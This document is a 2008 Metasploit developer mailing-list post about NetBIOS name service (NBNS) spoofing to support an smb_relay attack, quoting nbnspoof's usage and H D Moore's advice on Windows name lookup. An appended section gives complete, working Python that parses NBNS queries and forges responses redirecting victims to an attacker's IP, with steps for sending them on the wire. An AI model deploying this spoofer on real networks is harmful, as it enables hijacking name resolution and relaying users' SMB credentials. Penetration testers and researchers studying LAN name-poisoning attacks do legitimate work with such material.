I tried out nmbd, which worked, but it's a bit clunky, noisy, and only responds to requests for the aliases you've set up. So I decided to write my own NBNS responder in Scapy.
I got a bit into it and was googling to find a solution to a problem I was having, and came across the exact thing I was looking for! This is a broadcast NBNS request responder that will respond to any name queries that match a given regex. This is sufficient to redirect and complete an smb_relay-type attack (if the other prerequisites are met, of course). Also, if interested in a tutorial on Python and Scapy, he wrote a series of blog posts describing the process of writing the NBNS spoofer.

http://www.mcgrewsecurity.com/projects/nbnspoof/

Usage:

    sudo ./nbnspoof.py -v -i eth0 -n "[a-z]+" -h 192.168.1.100 -m 00:11:22:33:44:55

    nbnspoof.py [-v] -i <interface> -n <regexp> -h <ip address> -m <MAC>

    -v  Verbose output of sniffed NBNS name queries, and responses sent
    -i  The interface you want to sniff and send on
    -n  A regular expression applied to each query to determine whether a spoofed response will be sent
    -h  The IP address that will be sent in spoofed responses
    -m  The source MAC address for spoofed responses

natron

On Wed, Apr 9, 2008 at 4:50 PM, H D Moore <[EMAIL PROTECTED]> wrote:
> On Wednesday 09 April 2008, Señor Natron wrote:
> > However, when Victor wants to make an SMB connection, his PC issues an
> > NBSTAT request to the IP:137, which metasploit/linux has no idea what
> > to do with, and responds with an ICMP Type 3 Port Unreachable message.
>
> Yup, you can solve this by installing Samba, configuring the hostname in
> smbd.conf, and running the nmbd daemon. At some later point, it may make
> sense to add a NBNS responder to metasploit, but it doesn't sound like
> fun to write.
>
> > Questions:
> > 1) What causes Victor to issue an NBSTAT request? Is it something
> > wrong in my spoofed response packet, perhaps? (When Victor opens an
> > SMB connection to \\ip.add.res, it immediately performs an SMB connect
> > to :139; no NBSTAT to 137 is performed.) I've examined my spoofed
> > response and can't see anything that would be kicking off an NBSTAT
> > request, but I may be missing something.
>
> Name lookups in Windows loosely follow this order:
>
> 1. Hosts File
> 2. DNS
> 3. WINS
> 4. NBNS
>
> > 2) Anyone know if it's possible to answer 4) in such a way that Victor
> > will skip the NBSTAT request?
>
> Yeah, just reply to the DNS request.
>
> > 3) Is it possible to answer 4) with an NBSTAT response that
> > will elicit a Negotiate Protocol Request to :139 or :445?
>
> Yes, use nmbd from Samba.
>
> -HD
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers
>
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
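The exchange natron's spoofer takes part in, worked through as an added example that is not part of the thread and is not nbnspoof's code: a pure-Python (struct/socket, no Scapy) parser for the UDP/137 name query a client broadcasts, and the builder for the positive name query response that points the client at the attacker's IP. The packet layout follows RFC 1001/1002; the regex semantics (whole decoded name, case-insensitive), the TTL, the constructed sample query and every function name are my choices, not nbnspoof's. The parser also returns None for a node status (NBSTAT, QTYPE 0x0021) request, since that is a different query from the NB name query this responder answers.

```python
import re
import socket
import struct

# Constants from RFC 1002 (NetBIOS over TCP/UDP, name service on UDP/137).
QTYPE_NB = 0x0020      # name query: what a client sends before connecting to \\NAME
QTYPE_NBSTAT = 0x0021  # node status request: a different query, deliberately not answered here
CLASS_IN = 0x0001
FLAGS_QUERY = 0x0110          # request, OPCODE=query, RD=1, B=1 (broadcast)
FLAGS_POSITIVE_RESP = 0x8580  # response, OPCODE=query, AA=1, RD=1, RA=1, RCODE=0

def encode_netbios_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: pad to 15 bytes, append the suffix byte,
    then write each nibble as a letter 'A'..'P' (32 ASCII chars)."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix & 0xFF])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))

def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(encoded) != 32 or any(not 0x41 <= c <= 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((hi - 0x41) << 4) | (lo - 0x41) for hi, lo in zip(encoded[0::2], encoded[1::2]))
    # latin-1 never fails, so odd bytes in a name cannot crash the responder
    return raw[:15].rstrip(b" \x00").decode("latin-1"), raw[15]

def _read_name(pkt, off):
    """Read the length-prefixed labels at pkt[off:]; return (first_label, next_off) or None."""
    labels = []
    while True:
        if off >= len(pkt):
            return None
        length = pkt[off]
        off += 1
        if length == 0:
            break
        labels.append(pkt[off:off + length])
        off += length
    if not labels or len(labels[0]) != 32:
        return None
    return labels[0], off

def build_nbns_query(trn_id, name, suffix=0x20, qtype=QTYPE_NB):
    """Constructed sample: the broadcast query a Windows client sends for \\NAME.
    qtype=QTYPE_NBSTAT gives a node status request instead."""
    hdr = struct.pack("!6H", trn_id, FLAGS_QUERY, 1, 0, 0, 0)
    qname = bytes([32]) + encode_netbios_name(name, suffix) + b"\x00"
    return hdr + qname + struct.pack("!HH", qtype, CLASS_IN)

def parse_nbns_query(pkt):
    """Return (trn_id, name, suffix) for an NB name query; None for anything else
    (responses, other opcodes, NBSTAT requests, truncated or malformed packets)."""
    if len(pkt) < 12:
        return None
    trn_id, flags, qdcount = struct.unpack("!3H", pkt[:6])
    if flags & 0x8000 or (flags >> 11) & 0xF or qdcount != 1:
        return None
    got = _read_name(pkt, 12)
    if got is None or len(pkt) < got[1] + 4:
        return None
    label, off = got
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    if qtype != QTYPE_NB or qclass != CLASS_IN:
        return None
    try:
        name, suffix = decode_netbios_name(label)
    except ValueError:
        return None
    return trn_id, name, suffix

def build_nbns_response(trn_id, name, suffix, spoof_ip, ttl=165):
    """Positive name query response: one NB record whose RDATA is NB_FLAGS
    (0x0000 = unique name, B-node) followed by the IPv4 address the victim should use."""
    hdr = struct.pack("!6H", trn_id, FLAGS_POSITIVE_RESP, 0, 1, 0, 0)
    rr_name = bytes([32]) + encode_netbios_name(name, suffix) + b"\x00"
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(spoof_ip)
    return hdr + rr_name + struct.pack("!HHIH", QTYPE_NB, CLASS_IN, ttl, len(rdata)) + rdata

def parse_nbns_response(pkt):
    """Return (trn_id, name, suffix, ip) from a positive response, to check what we would send."""
    if len(pkt) < 12:
        return None
    trn_id, flags, _qd, ancount = struct.unpack("!4H", pkt[:8])
    if not flags & 0x8000 or ancount != 1:
        return None
    got = _read_name(pkt, 12)
    if got is None or len(pkt) < got[1] + 16:
        return None
    label, off = got
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    if rtype != QTYPE_NB or rclass != CLASS_IN or rdlen != 6:
        return None
    name, suffix = decode_netbios_name(label)
    return trn_id, name, suffix, socket.inet_ntoa(pkt[off + 12:off + 16])

def spoofed_reply(pkt, name_regex, spoof_ip):
    """Responder decision for one sniffed UDP/137 payload: answer only NB name
    queries whose decoded name matches name_regex (whole name, case-insensitive)."""
    q = parse_nbns_query(pkt)
    if q is None:
        return None
    trn_id, name, suffix = q
    if not re.fullmatch(name_regex, name, re.IGNORECASE):
        return None
    return build_nbns_response(trn_id, name, suffix, spoof_ip)
```

To put this on the wire you would sniff UDP/137 broadcasts on the chosen interface, feed each payload to spoofed_reply, and send the returned bytes back to the querier's source IP and port; a Scapy or raw-socket wrapper is also where the spoofed source MAC from nbnspoof's -m option would be set, since nothing in the NBNS payload itself carries it.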